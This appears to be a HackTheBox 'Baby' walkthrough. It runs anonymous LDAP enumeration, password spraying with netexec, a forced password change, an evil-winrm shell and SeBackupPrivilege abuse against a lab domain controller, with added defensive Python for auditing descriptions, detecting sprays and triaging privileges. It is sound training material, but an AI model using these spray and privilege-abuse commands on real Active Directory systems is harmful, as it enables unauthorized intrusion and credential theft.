HTB | Baby
Machine - https://app.hackthebox.com/machines/Baby
IP - 10.129.60.223
NMAP
nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389,49664,49669,51495,51496,51505,61220 10.129.60.223 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-16 06:10 UTC
Nmap scan report for ip-10-129-60-223.ap-south-1.compute.internal (10.129.60.223)
Host is up (0.12s latency).
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-10-16 06:11:00Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Not valid before: 2025-08-18T12:14:43
|_Not valid after:  2026-02-17T12:14:43
|_ssl-date: 2025-10-16T06:12:30+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: BABY
|   NetBIOS_Domain_Name: BABY
|   NetBIOS_Computer_Name: BABYDC
|   DNS_Domain_Name: baby.vl
|   DNS_Computer_Name: BabyDC.baby.vl
|   DNS_Tree_Name: baby.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-10-16T06:11:50+00:00
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
51495/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
51496/tcp open  msrpc         Microsoft Windows RPC
51505/tcp open  msrpc         Microsoft Windows RPC
61220/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time: 
|   date: 2025-10-16T06:11:53
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 102.16 seconds
SMB
Null authentication is accepted, but we cannot enumerate shares with it:
netexec smb baby.vl -u "" -p "" --shares
SMB         10.129.60.223   445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.60.223   445    BABYDC           [+] baby.vl\: 
SMB         10.129.60.223   445    BABYDC           [-] Error enumerating shares: STATUS_ACCESS_DENIED
LDAP
ldapsearch -H ldap://10.129.60.223 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#
#
dn:
namingcontexts: DC=baby,DC=vl
namingcontexts: CN=Configuration,DC=baby,DC=vl
namingcontexts: CN=Schema,CN=Configuration,DC=baby,DC=vl
namingcontexts: DC=DomainDnsZones,DC=baby,DC=vl
namingcontexts: DC=ForestDnsZones,DC=baby,DC=vl
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
We can get the user list with netexec (nxc) over an anonymous LDAP bind:
netexec ldap baby.vl -u "" -p "" --users
LDAP        10.129.60.223   389    BABYDC           [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.60.223   389    BABYDC           [+] baby.vl\: 
LDAP        10.129.60.223   389    BABYDC           [*] Enumerated 9 domain users: baby.vl
LDAP        10.129.60.223   389    BABYDC           -Username-                    -Last PW Set-       -BadPW-  -Description-                                               
LDAP        10.129.60.223   389    BABYDC           Guest                         <never>             0        Built-in account for guest access to the computer/domain    
LDAP        10.129.60.223   389    BABYDC           Jacqueline.Barnett            2021-11-21 15:11:03 0                                                                    
LDAP        10.129.60.223   389    BABYDC           Ashley.Webb                   2021-11-21 15:11:03 0                                                                    
LDAP        10.129.60.223   389    BABYDC           Hugh.George                   2021-11-21 15:11:03 0                                                                    
LDAP        10.129.60.223   389    BABYDC           Leonard.Dyer                  2021-11-21 15:11:03 0                                                                    
LDAP        10.129.60.223   389    BABYDC           Connor.Wilkinson              2021-11-21 15:11:08 0                                                                    
LDAP        10.129.60.223   389    BABYDC           Joseph.Hughes                 2021-11-21 15:11:08 0                                                                    
LDAP        10.129.60.223   389    BABYDC           Kerry.Wilson                  2021-11-21 15:11:08 0                                                                    
LDAP        10.129.60.223   389    BABYDC           Teresa.Bell                   2021-11-21 15:14:37 0        Set initial password to BabyStart123!
Teresa.Bell's description leaks what looks like an initial password. Only nine users came back, so we also list every object in the directory to see the OUs and any accounts the --users listing missed:
netexec ldap baby.vl -u "" -p "" --query "(objectClass=*)" "" | grep "Response for object:"
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Administrator,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Guest,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=krbtgt,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Domain Computers,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Schema Admins,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Enterprise Admins,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Cert Publishers,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Domain Admins,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Domain Users,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Domain Guests,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Group Policy Creator Owners,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=RAS and IAS Servers,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Allowed RODC Password Replication Group,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Denied RODC Password Replication Group,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Cloneable Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Protected Users,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Key Admins,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Enterprise Key Admins,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=DnsAdmins,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=DnsUpdateProxy,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=dev,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Jacqueline Barnett,OU=dev,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Ashley Webb,OU=dev,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Hugh George,OU=dev,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Leonard Dyer,OU=dev,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Ian Walker,OU=dev,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=it,CN=Users,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Connor Wilkinson,OU=it,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Joseph Hughes,OU=it,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Kerry Wilson,OU=it,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Teresa Bell,OU=it,DC=baby,DC=vl
LDAP                     10.129.60.223   389    BABYDC           [+] Response for object: CN=Caroline Robinson,OU=it,DC=baby,DC=vl
The object listing shows two accounts that --users did not return, Ian Walker and Caroline Robinson. Let's combine both lists into username.txt.
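The merge of the two listings above, done with a short Python script that is added here as an example (it is not part of the original writeup and not netexec's own code). It parses netexec's --users table and the object-listing lines, builds one username list, and, from the defender's side, flags any description that mentions a password or credential, which is the audit that would have caught Teresa.Bell's description before anyone else did. The sample lines are constructed from the output above; the mapping of a CN of "First Last" to the "First.Last" logon name, and the rule that person accounts live under an OU (so Administrator, which sits in CN=Users among the groups, is deliberately left out), are assumptions.

```python
"""Merge two netexec LDAP listings into one user list and audit descriptions.

Added example for this writeup; not the page's or netexec's own code.
Sample lines below are constructed from the output shown above.
"""
import re

# Constructed sample of `netexec ldap ... --users` output (a few rows).
USERS_OUTPUT = """\
LDAP        10.129.60.223   389    BABYDC           [*] Enumerated 9 domain users: baby.vl
LDAP        10.129.60.223   389    BABYDC           -Username-                    -Last PW Set-       -BadPW-  -Description-
LDAP        10.129.60.223   389    BABYDC           Guest                         <never>             0        Built-in account for guest access to the computer/domain
LDAP        10.129.60.223   389    BABYDC           Jacqueline.Barnett            2021-11-21 15:11:03 0
LDAP        10.129.60.223   389    BABYDC           Hugh.George                   2021-11-21 15:11:03 0
LDAP        10.129.60.223   389    BABYDC           Teresa.Bell                   2021-11-21 15:14:37 0        Set initial password to BabyStart123!
"""

# Constructed sample of `netexec ldap ... --query "(objectClass=*)" ""` output.
QUERY_OUTPUT = """\
LDAP        10.129.60.223   389    BABYDC           [+] Response for object: DC=baby,DC=vl
LDAP        10.129.60.223   389    BABYDC           [+] Response for object: CN=Administrator,CN=Users,DC=baby,DC=vl
LDAP        10.129.60.223   389    BABYDC           [+] Response for object: CN=Domain Admins,CN=Users,DC=baby,DC=vl
LDAP        10.129.60.223   389    BABYDC           [+] Response for object: CN=dev,CN=Users,DC=baby,DC=vl
LDAP        10.129.60.223   389    BABYDC           [+] Response for object: CN=Jacqueline Barnett,OU=dev,DC=baby,DC=vl
LDAP        10.129.60.223   389    BABYDC           [+] Response for object: CN=Ian Walker,OU=dev,DC=baby,DC=vl
LDAP        10.129.60.223   389    BABYDC           [+] Response for object: CN=it,CN=Users,DC=baby,DC=vl
LDAP        10.129.60.223   389    BABYDC           [+] Response for object: CN=Teresa Bell,OU=it,DC=baby,DC=vl
LDAP        10.129.60.223   389    BABYDC           [+] Response for object: CN=Caroline Robinson,OU=it,DC=baby,DC=vl
"""

# One --users row: tool, ip, port, host, then username, last-set, bad-pw count,
# and whatever is left as the description.
USERS_RE = re.compile(
    r"^LDAP\s+\S+\s+\d+\s+\S+\s+"
    r"(?P<user>\S+)\s+"
    r"(?P<pwset><never>|\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\s+"
    r"(?P<badpw>\d+)\s*"
    r"(?P<desc>.*?)\s*$"
)
OBJECT_RE = re.compile(r"Response for object:\s*(?P<dn>\S.*?)\s*$")
# Words that should never appear in a user description (audit heuristic).
CRED_HINT_RE = re.compile(r"(?i)\b(pass(word|wd)?|pwd|cred(ential)?s?|pin)\b")


def parse_users(users_output):
    """Return {sAMAccountName: description} from the --users table."""
    users = {}
    for line in users_output.splitlines():
        m = USERS_RE.match(line)
        if m:
            users[m["user"]] = m["desc"]
    return users


def parse_ou_accounts(query_output):
    """Logon-name guesses for objects that sit directly under an OU.

    Assumption: 'CN=First Last,OU=...' corresponds to the 'First.Last'
    sAMAccountName format seen in the --users listing.
    """
    names = []
    for line in query_output.splitlines():
        m = OBJECT_RE.search(line)
        if not m:
            continue
        parts = m["dn"].split(",")
        if len(parts) < 2 or not parts[0].startswith("CN=") or not parts[1].startswith("OU="):
            continue
        names.append(parts[0][3:].replace(" ", "."))
    return names


def combine_user_lists(users_output, query_output):
    """Union of both listings, sorted case-insensitively for username.txt."""
    merged = set(parse_users(users_output)) | set(parse_ou_accounts(query_output))
    return sorted(merged, key=str.lower)


def flag_credential_descriptions(users_output):
    """(user, description) pairs whose description looks like it holds a secret."""
    return [(u, d) for u, d in parse_users(users_output).items()
            if d and CRED_HINT_RE.search(d)]


if __name__ == "__main__":
    print("\n".join(combine_user_lists(USERS_OUTPUT, QUERY_OUTPUT)))
    for user, desc in flag_credential_descriptions(USERS_OUTPUT):
        print(f"AUDIT: {user} description looks like a credential: {desc!r}")
```

Run against a real directory, the same description check is a cheap scheduled audit: the description attribute is readable by every authenticated user (and, as this box shows, sometimes by anonymous binds), so anything that belongs in a password vault should never be there.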
Foothold/shell
Shell as Caroline.Robinson
From Teresa.Bell's description we have a candidate credential, BabyStart123!, so let's test it against SMB, WinRM and LDAP:
netexec smb baby.vl -u "Teresa.Bell" -p "BabyStart123!"
SMB         10.129.60.223   445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.60.223   445    BABYDC           [-] baby.vl\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE 
netexec winrm baby.vl -u "Teresa.Bell" -p "BabyStart123!"
WINRM       10.129.60.223   5985   BABYDC           [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl) 
WINRM       10.129.60.223   5985   BABYDC           [-] baby.vl\Teresa.Bell:BabyStart123!
netexec ldap baby.vl -u "Teresa.Bell" -p "BabyStart123!"
LDAP        10.129.60.223   389    BABYDC           [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.60.223   389    BABYDC           [-] baby.vl\Teresa.Bell:BabyStart123!
The password does not work for Teresa.Bell herself, so let's spray it across the user list:
netexec smb baby.vl -u username.txt -p 'BabyStart123!' --continue-on-success
SMB         10.129.60.223   445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.60.223   445    BABYDC           [-] baby.vl\Jacqueline.Barnett:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.60.223   445    BABYDC           [-] baby.vl\Ashley.Webb:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.60.223   445    BABYDC           [-] baby.vl\Hugh.George:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.60.223   445    BABYDC           [-] baby.vl\Leonard.Dyer:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.60.223   445    BABYDC           [-] baby.vl\Ian.Walker:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.60.223   445    BABYDC           [-] baby.vl\it:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.60.223   445    BABYDC           [-] baby.vl\Connor.Wilkinson:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.60.223   445    BABYDC           [-] baby.vl\Joseph.Hughes:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.60.223   445    BABYDC           [-] baby.vl\Kerry.Wilson:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.60.223   445    BABYDC           [-] baby.vl\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.60.223   445    BABYDC           [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE 
The SMB spray fails for everyone except Caroline.Robinson, whose result is STATUS_PASSWORD_MUST_CHANGE rather than STATUS_LOGON_FAILURE: the DC accepted the password but requires it to be changed before the account can be used. Let's see whether LDAP reports the same:
netexec ldap baby.vl -u username.txt -p 'BabyStart123!' --continue-on-success
LDAP        10.129.60.223   389    BABYDC           [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.60.223   389    BABYDC           [-] baby.vl\Jacqueline.Barnett:BabyStart123! 
LDAP        10.129.60.223   389    BABYDC           [-] baby.vl\Ashley.Webb:BabyStart123! 
LDAP        10.129.60.223   389    BABYDC           [-] baby.vl\Hugh.George:BabyStart123! 
LDAP        10.129.60.223   389    BABYDC           [-] baby.vl\Leonard.Dyer:BabyStart123! 
LDAP        10.129.60.223   389    BABYDC           [-] baby.vl\Ian.Walker:BabyStart123! 
LDAP        10.129.60.223   389    BABYDC           [-] baby.vl\it:BabyStart123! 
LDAP        10.129.60.223   389    BABYDC           [-] baby.vl\Connor.Wilkinson:BabyStart123! 
LDAP        10.129.60.223   389    BABYDC           [-] baby.vl\Joseph.Hughes:BabyStart123! 
LDAP        10.129.60.223   389    BABYDC           [-] baby.vl\Kerry.Wilson:BabyStart123! 
LDAP        10.129.60.223   389    BABYDC           [-] baby.vl\Teresa.Bell:BabyStart123! 
LDAP        10.129.60.223   389    BABYDC           [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE
LDAP returns the same STATUS_PASSWORD_MUST_CHANGE for Caroline, so we change her password with netexec's change-password module; the expiring password itself is enough to authenticate the change.
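Seen from the domain controller, the spray above is a burst of failed logons for many different accounts from one source within a few seconds, each recorded as a 4625 event. The Python below is an added example, not part of the writeup or of any tool on the page: it runs a per-source sliding-window count of distinct target accounts over a constructed, simplified event list that mirrors the spray (the field names, the 10.10.14.5 source address, the timestamps and the 60-second window are assumptions), and it separately reports the NTSTATUS codes that the DC only returns after it has verified the password. That is why a must-change result inside a spray deserves the same response as a successful logon.

```python
"""Detect a password spray in simplified logon-failure events and pull out
the statuses that imply the supplied password was actually correct.

Added example for this writeup, not part of the page or of netexec. The
event records are constructed (field names, the 10.10.14.5 source and the
timestamps are assumptions) to mirror the spray shown above as a DC would
record it in event 4625.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# NTSTATUS values as they appear in the Status/SubStatus fields of event 4625.
STATUS_NAMES = {
    "0xC000006D": "STATUS_LOGON_FAILURE",
    "0xC000006A": "STATUS_WRONG_PASSWORD",
    "0xC0000072": "STATUS_ACCOUNT_DISABLED",
    "0xC0000234": "STATUS_ACCOUNT_LOCKED_OUT",
    "0xC0000071": "STATUS_PASSWORD_EXPIRED",
    "0xC0000224": "STATUS_PASSWORD_MUST_CHANGE",
}
# The DC only reaches these two after the password has been verified, so in a
# spray they mean "right password, account needs attention".
POST_VERIFY_STATUSES = {"0xC0000071", "0xC0000224"}

# The account list that was sprayed above (username.txt in the writeup).
SPRAY_USERS = [
    "Jacqueline.Barnett", "Ashley.Webb", "Hugh.George", "Leonard.Dyer",
    "Ian.Walker", "it", "Connor.Wilkinson", "Joseph.Hughes", "Kerry.Wilson",
    "Teresa.Bell", "Caroline.Robinson",
]


def build_sample_events():
    """Constructed 4625-style records: one spray burst from a single source,
    plus a benign user who mistypes their own password from another host."""
    base = datetime(2025, 10, 16, 6, 30, 0)
    events = []
    for i, user in enumerate(SPRAY_USERS):
        status = "0xC0000224" if user == "Caroline.Robinson" else "0xC000006A"
        events.append({"time": base + timedelta(seconds=i),
                       "src_ip": "10.10.14.5", "user": user, "status": status})
    for i in range(3):
        events.append({"time": base + timedelta(minutes=5 * i),
                       "src_ip": "10.10.20.7", "user": "Hugh.George",
                       "status": "0xC000006A"})
    return events


def detect_spray(events, window_seconds=60, min_distinct_users=5):
    """Per source address, find the window holding the most distinct target
    accounts and report sources that reach the threshold."""
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src_ip"]].append(e)
    findings = []
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["time"])
        best_count, best_start = 0, None
        for i, start in enumerate(evs):
            limit = start["time"] + timedelta(seconds=window_seconds)
            users = {e["user"] for e in evs[i:] if e["time"] <= limit}
            if len(users) > best_count:
                best_count, best_start = len(users), start["time"]
        if best_count >= min_distinct_users:
            findings.append({"src_ip": src, "distinct_users": best_count,
                             "window_start": best_start})
    return findings


def valid_credential_hints(events):
    """Accounts whose failure status shows the password itself was right."""
    return [(e["user"], STATUS_NAMES[e["status"]])
            for e in events if e["status"] in POST_VERIFY_STATUSES]


if __name__ == "__main__":
    sample = build_sample_events()
    for f in detect_spray(sample):
        print(f"spray from {f['src_ip']}: {f['distinct_users']} accounts "
              f"within 60s starting {f['window_start']:%H:%M:%S}")
    for user, status in valid_credential_hints(sample):
        print(f"{user}: {status} -> password verified, reset and review the account")
```

The threshold and window are tuning knobs: a help desk host may legitimately fail logons for several accounts in an hour, but eleven distinct accounts in ten seconds from one address is not normal traffic. A spray with one password per account also stays under any lockout threshold, which is why the distinct-account count per source, not the per-account failure count, is the signal to alert on.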
netexec smb baby.vl -u 'Caroline.Robinson' -p 'BabyStart123!' -M change-password -o NEWPASS='P@ssw0rd@123'
SMB         10.129.60.223   445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.60.223   445    BABYDC           [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE 
CHANGE-P... 10.129.60.223   445    BABYDC           [+] Successfully changed password for Caroline.Robinson
Now we can authenticate with the new password:
netexec ldap baby.vl -u 'Caroline.Robinson' -p 'P@ssw0rd@123'
LDAP        10.129.60.223   389    BABYDC           [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.60.223   389    BABYDC           [+] baby.vl\Caroline.Robinson:P@ssw0rd@123 (Pwn3d!)
Share enumeration now works, and netexec reports READ,WRITE on the C$ admin share:
netexec smb baby.vl -u 'Caroline.Robinson' -p 'P@ssw0rd@123' --shares
SMB         10.129.60.223   445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.60.223   445    BABYDC           [+] baby.vl\Caroline.Robinson:P@ssw0rd@123 
SMB         10.129.60.223   445    BABYDC           [*] Enumerated shares
SMB         10.129.60.223   445    BABYDC           Share           Permissions     Remark
SMB         10.129.60.223   445    BABYDC           -----           -----------     ------
SMB         10.129.60.223   445    BABYDC           ADMIN$          READ            Remote Admin
SMB         10.129.60.223   445    BABYDC           C$              READ,WRITE      Default share
SMB         10.129.60.223   445    BABYDC           IPC$            READ            Remote IPC
SMB         10.129.60.223   445    BABYDC           NETLOGON        READ            Logon server share 
SMB         10.129.60.223   445    BABYDC           SYSVOL          READ            Logon server share
WinRM is open on 5985, so let's check whether Caroline can log in remotely:
netexec winrm baby.vl -u 'Caroline.Robinson' -p 'P@ssw0rd@123'
WINRM       10.129.60.223   5985   BABYDC           [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl) 
WINRM       10.129.60.223   5985   BABYDC           [+] baby.vl\Caroline.Robinson:P@ssw0rd@123 (Pwn3d!)
WinRM access works, so we get a shell with evil-winrm:
ruby /opt/evil-winrm/evil-winrm.rb -i 10.129.60.223 -u 'Caroline.Robinson' -p 'P@ssw0rd@123'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents>
user.txt is on Caroline's Desktop:
   Directory: C:\Users\Caroline.Robinson\Desktop
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---        10/16/2025   6:06 AM             34 user.txt
Privilege Escalation
Shell as ?
SeBackupPrivilege
Caroline is a member of the Backup Operators group and holds SeBackupPrivilege (with SeRestorePrivilege alongside it), which lets her read files regardless of their ACLs:
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
BABY\it                                    Group            S-1-5-21-1407081343-4001094062-1444647654-1109 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
There is a public repository with a set of PowerShell cmdlets for abusing SeBackupPrivilege (SeBackupPrivilegeCmdLets.dll and SeBackupPrivilegeUtils.dll).
Let's download and import them into my current session:
*Evil-WinRM* PS C:\temp> Import-Module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\temp> Import-Module .\SeBackupPrivilegeUtils.dll
Now I can copy root.txt, which is read with backup semantics rather than through its ACL:
Copy-FileSeBackupPrivilege C:\Users\Administrator\Desktop\root.txt root.txt
*Evil-WinRM* PS C:\\temp> dir
    Directory: C:\temp
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        10/16/2025   9:18 AM             34 root.txt
-a----        10/16/2025   8:50 AM          12288 SeBackupPrivilegeCmdLets.dll
-a----        10/16/2025   8:50 AM          16384 SeBackupPrivilegeUtils.dll
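What a triager would do with the two whoami tables from the privilege escalation section above, as an added Python example that is not part of the writeup: parse each table by using the run of "=" under its header to find the column boundaries, then flag group SIDs and privilege names that grant access beyond the account's own ACLs. The two tables are constructed here to match the output above (whoami pads every column to its widest entry, which the small builder reproduces); the risk annotations are short summaries written for this example, not tool output.

```python
"""Triage `whoami /groups` and `whoami /priv` output for grants that bypass
ordinary ACL checks.

Added example for this writeup (not the page's own code). The two tables
are constructed to match the output above: whoami pads each column to its
widest entry and underlines the header with runs of '=', which the parser
uses to find column boundaries. Risk notes are summaries, not tool output.
"""

# Well-known SIDs whose membership matters on a domain controller.
RISKY_GROUPS = {
    "S-1-5-32-544": "Administrators: full control of the host",
    "S-1-5-32-548": "Account Operators: can modify most domain accounts and groups",
    "S-1-5-32-549": "Server Operators: can manage services and shares on domain controllers",
    "S-1-5-32-551": "Backup Operators: SeBackup/SeRestore, file access regardless of ACL",
    "S-1-5-32-580": "Remote Management Users: WinRM makes every other grant reachable remotely",
}
RISKY_PRIVS = {
    "SeBackupPrivilege": "read any file with backup semantics, bypassing its DACL",
    "SeRestorePrivilege": "write any file with restore semantics, bypassing its DACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeDebugPrivilege": "open any process regardless of its ACL",
    "SeImpersonatePrivilege": "impersonate other users' tokens",
    "SeLoadDriverPrivilege": "load kernel drivers",
}


def parse_whoami_table(text):
    """Parse one whoami table into a list of {header: value} dicts.

    Column starts are taken from the '=' ruler under the header, so the
    parser needs no fixed widths and copes with rows that end early (the
    Mandatory Label row has no Attributes column).
    """
    lines = text.splitlines()
    ruler_idx = next(i for i, line in enumerate(lines)
                     if line.strip() and set(line.strip()) <= {"=", " "})
    ruler = lines[ruler_idx]
    starts = [i for i, ch in enumerate(ruler)
              if ch == "=" and (i == 0 or ruler[i - 1] != "=")]
    ends = starts[1:] + [None]

    def cut(line):
        return [line[s:e].strip() for s, e in zip(starts, ends)]

    headers = cut(lines[ruler_idx - 1])
    rows = []
    for line in lines[ruler_idx + 1:]:
        if not line.strip():
            break
        rows.append(dict(zip(headers, cut(line))))
    return rows


def triage(groups_text, priv_text):
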